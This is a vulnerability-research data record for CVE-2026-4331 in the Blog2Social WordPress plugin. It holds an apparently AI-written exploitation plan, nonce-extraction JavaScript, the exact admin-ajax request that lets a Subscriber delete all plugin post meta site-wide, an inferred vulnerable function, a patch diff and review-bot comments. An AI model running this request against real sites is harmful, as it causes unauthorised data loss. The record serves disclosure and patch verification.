[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f2T4JPn7iZnIudLE36zDD56CEn-5k61KviCNYfWi8-2I":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":35,"research_fix_diff":36,"research_exploit_outline":37,"research_model_used":38,"research_started_at":39,"research_completed_at":40,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":41},"CVE-2026-4331","blog2social-social-media-auto-post-scheduler-missing-authorization-to-authenticated-subscriber-arbitrary-post-meta-delet","Blog2Social: Social Media Auto Post & Scheduler \u003C= 8.8.2 - Missing Authorization to Authenticated (Subscriber+) Arbitrary Post Meta Deletion via 'b2s_reset_social_meta_tags' AJAX Action","The Blog2Social: Social Media Auto Post & Scheduler plugin for WordPress is vulnerable to unauthorized data loss in all versions up to, and including, 8.8.2. This is due to the resetSocialMetaTags() function only verifying that the user has the 'read' capability and a valid b2s_security_nonce, both of which are available to Subscriber-level users, as the plugin grants 'blog2social_access' capability to all roles upon activation, allowing them to access the plugin's admin pages where the nonce is output. 
This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete all _b2s_post_meta records from the wp_postmeta table, permanently removing all custom social media meta tags for every post on the site.","blog2social",null,"\u003C=8.8.2","8.8.3","medium",4.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-03-25 14:26:40","2026-03-26 03:37:27",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F7dc46bc4-ecfb-438f-b951-7b957489cd96?source=api-prod",1,[22,23,24,25,26,27,28,29],"assets\u002Fjs\u002Fb2s\u002Fcalendar.js","assets\u002Fjs\u002Fb2s\u002Fcuration.draft.js","assets\u002Fjs\u002Fb2s\u002Fcuration.js","assets\u002Fjs\u002Fb2s\u002Fmetrics.js","assets\u002Fjs\u002Fb2s\u002Fnetwork.js","assets\u002Fjs\u002Fb2s\u002Fpost.js","assets\u002Fjs\u002Fb2s\u002Frepost.js","assets\u002Fjs\u002Fb2s\u002Fship.js","researched",false,3,"# Exploitation Research Plan: CVE-2026-4331\n\n## 1. Vulnerability Summary\nThe **Blog2Social** plugin (\u003C= 8.8.2) contains a missing authorization vulnerability in the `resetSocialMetaTags()` function. This function is triggered by the `b2s_reset_social_meta_tags` AJAX action. \n\nThe vulnerability exists because:\n1. The function only checks for the `read` capability (assigned to all authenticated users, including Subscribers).\n2. The function checks for a nonce named `b2s_security_nonce`.\n3. Upon activation, the plugin grants the `blog2social_access` capability to all user roles (including Subscribers), which allows them to view the plugin's admin dashboard where the `b2s_security_nonce` is generated and displayed in the HTML.\n4. An authenticated attacker with Subscriber-level access can trigger this action to delete all `_b2s_post_meta` entries from the `wp_postmeta` table site-wide, causing permanent data loss for social media scheduling and meta configurations.\n\n## 2. 
Attack Vector Analysis\n- **Endpoint**: `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Action**: `b2s_reset_social_meta_tags`\n- **Required Authentication**: Subscriber+ (any user with `read` capability).\n- **Required Parameters**:\n    - `action`: `b2s_reset_social_meta_tags`\n    - `b2s_security_nonce`: A valid nonce for the action (available in the dashboard).\n- **Precondition**: The plugin must be active, and at least some posts must have Blog2Social meta tags (`_b2s_post_meta`) stored.\n\n## 3. Code Flow\n1. **Request Entry**: A `POST` or `GET` request is sent to `admin-ajax.php` with the action `b2s_reset_social_meta_tags`.\n2. **Hook Registration**: The plugin registers the action (likely in the main plugin class or an AJAX handler class):\n   ```php\n   add_action('wp_ajax_b2s_reset_social_meta_tags', [$this, 'resetSocialMetaTags']);\n   ```\n3. **Authorization Check (Vulnerable)**: Inside `resetSocialMetaTags()`, the code checks:\n   ```php\n   if (!current_user_can('read')) { \u002F\u002F Subscriber has this\n       wp_die();\n   }\n   check_ajax_referer('b2s_security_nonce', 'b2s_security_nonce');\n   ```\n4. **Data Deletion (Sink)**: The function proceeds to execute a database query to delete metadata:\n   ```php\n   global $wpdb;\n   $wpdb->query(\"DELETE FROM {$wpdb->prefix}postmeta WHERE meta_key = '_b2s_post_meta'\");\n   ```\n\n## 4. Nonce Acquisition Strategy\nThe `b2s_security_nonce` is required. The provided JS files (e.g., `assets\u002Fjs\u002Fb2s\u002Fcalendar.js`, `assets\u002Fjs\u002Fb2s\u002Fcuration.draft.js`) show that the nonce is retrieved from an HTML element with the ID `b2s_security_nonce`.\n\n**Strategy**:\n1. Log in as a Subscriber.\n2. Navigate to any Blog2Social dashboard page (e.g., `\u002Fwp-admin\u002Fadmin.php?page=blog2social`).\n3. 
Use `browser_eval` to extract the value of the `#b2s_security_nonce` input field.\n\n```javascript\n\u002F\u002F Example extraction via browser_eval\nvar nonce = document.getElementById('b2s_security_nonce')?.value;\nreturn nonce;\n```\n\n## 5. Exploitation Strategy\n\n### Step 1: Preparation\n- Create a Subscriber user.\n- Create several posts and ensure they have `_b2s_post_meta` records (simulated via WP-CLI).\n\n### Step 2: Nonce Retrieval\n- Navigate the browser to the Blog2Social dashboard.\n- Extract the `b2s_security_nonce`.\n\n### Step 3: Trigger Meta Deletion\nSend the malicious AJAX request.\n\n- **Method**: `POST`\n- **URL**: `http:\u002F\u002FTARGET\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Headers**: \n    - `Content-Type: application\u002Fx-www-form-urlencoded`\n    - `Cookie`: (Subscriber session cookies)\n- **Body**:\n  ```text\n  action=b2s_reset_social_meta_tags&b2s_security_nonce=[EXTRACTED_NONCE]\n  ```\n\n## 6. Test Data Setup\n1. **Install Plugin**: `blog2social` version 8.8.2.\n2. **Create User**:\n   ```bash\n   wp user create attacker attacker@example.com --role=subscriber --user_pass=password\n   ```\n3. **Add Sample Meta**:\n   ```bash\n   # Add Blog2Social meta to post 1\n   wp post create --post_title=\"Victim Post\" --post_status=publish\n   wp post list --field=ID # Assume ID 123\n   wp post meta add 123 _b2s_post_meta '{\"test\":\"data\"}'\n   ```\n4. **Verify Meta Exists**:\n   ```bash\n   wp db query \"SELECT count(*) FROM wp_postmeta WHERE meta_key = '_b2s_post_meta';\"\n   ```\n\n## 7. Expected Results\n- The AJAX response should be successful (likely `1`, `{\"result\": true}`, or a `200 OK`).\n- All records in `wp_postmeta` where `meta_key = '_b2s_post_meta'` will be deleted.\n\n## 8. Verification Steps\n1. **Check Database**:\n   ```bash\n   wp db query \"SELECT count(*) FROM wp_postmeta WHERE meta_key = '_b2s_post_meta';\"\n   ```\n   - **Successful Exploit**: Returns `0`.\n   - **Failed Exploit**: Returns the original count.\n2. 
**Check Access**: Confirm the Subscriber was able to reach the page even if they don't have typical admin capabilities.\n\n## 9. Alternative Approaches\nIf the `b2s_reset_social_meta_tags` action is not available via `wp_ajax_` (authenticated), check for `wp_ajax_nopriv_`. However, based on the description, it is specifically an authenticated (Subscriber+) vulnerability.\n\nIf the nonce is not found on the main dashboard, check other sub-pages registered by the plugin:\n- `admin.php?page=blog2social-networks`\n- `admin.php?page=blog2social-posts`\n\nVerify if `blog2social_access` is indeed granted to Subscribers by checking the roles:\n```bash\nwp cap list subscriber | grep blog2social\n```","The Blog2Social plugin for WordPress is vulnerable to unauthorized arbitrary post meta deletion due to insufficient authorization checks in the 'resetSocialMetaTags' AJAX function. Authenticated attackers with Subscriber-level access can exploit this to delete all '_b2s_post_meta' records site-wide, as the plugin grants all users access to the dashboard where the required security nonce is exposed.","\u002F\u002F Logic inferred from the vulnerability description and research plan\n\u002F\u002F Function responsible for handling the b2s_reset_social_meta_tags action\n\npublic function resetSocialMetaTags() {\n    \u002F\u002F Vulnerable check: 'read' capability is possessed by all authenticated users (Subscribers+)\n    if (!current_user_can('read')) {\n        wp_die();\n    }\n\n    \u002F\u002F Nonce is accessible to all roles because blog2social_access is granted to all roles on activation\n    check_ajax_referer('b2s_security_nonce', 'b2s_security_nonce');\n\n    global $wpdb;\n    \u002F\u002F Sink: Deletes all metadata for the plugin site-wide without post-specific authorization\n    $wpdb->query(\"DELETE FROM {$wpdb->prefix}postmeta WHERE meta_key = '_b2s_post_meta'\");\n    \n    wp_send_json_success();\n}","diff -ru 
\u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fblog2social\u002F8.8.2\u002Fassets\u002Fjs\u002Fb2s\u002Fcalendar.js \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fblog2social\u002F8.8.3\u002Fassets\u002Fjs\u002Fb2s\u002Fcalendar.js\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fblog2social\u002F8.8.2\u002Fassets\u002Fjs\u002Fb2s\u002Fcalendar.js\t2026-02-27 11:37:02.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fblog2social\u002F8.8.3\u002Fassets\u002Fjs\u002Fb2s\u002Fcalendar.js\t2026-03-23 13:17:40.000000000 +0000\n@@ -302,6 +302,11 @@\n                         'b2s_security_nonce': jQuery('#b2s_security_nonce').val()\n                     },\n                     success: function (data) {\n+                        if (data && data.result === false && data.error == 'permission') {\n+                            jQuery('.b2s-no-permission').show();\n+                            revertFunc();\n+                            return;\n+                        }\n                         refreshCalender();\n                         wp.heartbeat.connectNow();\n                     }\ndiff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fblog2social\u002F8.8.2\u002Fassets\u002Fjs\u002Fb2s\u002Fcuration.draft.js \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fblog2social\u002F8.8.3\u002Fassets\u002Fjs\u002Fb2s\u002Fcuration.draft.js\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fblog2social\u002F8.8.2\u002Fassets\u002Fjs\u002Fb2s\u002Fcuration.draft.js\t2026-02-27 11:37:02.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fblog2social\u002F8.8.3\u002Fassets\u002Fjs\u002Fb2s\u002Fcuration.draft.js\t2026-03-23 13:17:40.000000000 +0000\n@@ -134,6 +134,9 @@\n                 if 
(data.error == 'nonce') {\n                     jQuery('.b2s-nonce-check-fail').show();\n                 }\n+                if (data.error == 'permission') {\n+                    jQuery('.b2s-no-permission').show();\n+                }\n                 jQuery('.b2s-post-remove-fail').show();\n             }","1. Log in to the target WordPress site as an authenticated user with at least Subscriber privileges.\n2. Access the Blog2Social plugin dashboard (e.g., via `\u002Fwp-admin\u002Fadmin.php?page=blog2social`). Access is possible because the plugin grants the 'blog2social_access' capability to all roles by default.\n3. Locate and extract the value of the 'b2s_security_nonce' field from the page source.\n4. Trigger the 'b2s_reset_social_meta_tags' AJAX action by sending a POST request to '\u002Fwp-admin\u002Fadmin-ajax.php' with the following parameters: 'action=b2s_reset_social_meta_tags' and 'b2s_security_nonce=[EXTRACTED_NONCE]'.\n5. Verify that all social media meta tags (stored with meta_key '_b2s_post_meta') have been deleted from the 'wp_postmeta' database table.","gemini-3-flash-preview","2026-04-17 22:49:34","2026-04-17 22:49:53",{"type":42,"vulnerable_version":43,"fixed_version":11,"vulnerable_browse":44,"vulnerable_zip":45,"fixed_browse":46,"fixed_zip":47,"all_tags":48},"plugin","8.8.2","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fblog2social\u002Ftags\u002F8.8.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fblog2social.8.8.2.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fblog2social\u002Ftags\u002F8.8.3","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fblog2social.8.8.3.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fblog2social\u002Ftags"]
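Review bot: in the calendar.js success callback (hunk @@ -302), only `data.error == 'permission'` reaches `revertFunc()`; any other failed response, such as the `'nonce'` error that curation.draft.js handles, still falls through to `refreshCalender()` as if the request had succeeded. Consider reverting on every `data.result === false` and picking the message by error type, and compare the error with `===` to match the strict check on `data.result`. These lines are display logic only: the capability check that produces the 'permission' error runs server-side and is not among the visible lines, so the authorization fix itself cannot be confirmed from this hunk.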
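Review bot: in curation.draft.js (hunk @@ -134), the new `'permission'` branch shows `.b2s-no-permission`, but `jQuery('.b2s-post-remove-fail').show();` still runs unconditionally right after it, so a user without permission gets the specific banner and the generic failure banner together. Consider making the generic message the fallback for unrecognised errors only, and use `===` for the `data.error` comparison. The visible diff for this file touches client-side error display only; the server-side check on the AJAX handler is not shown here and should be reviewed alongside it.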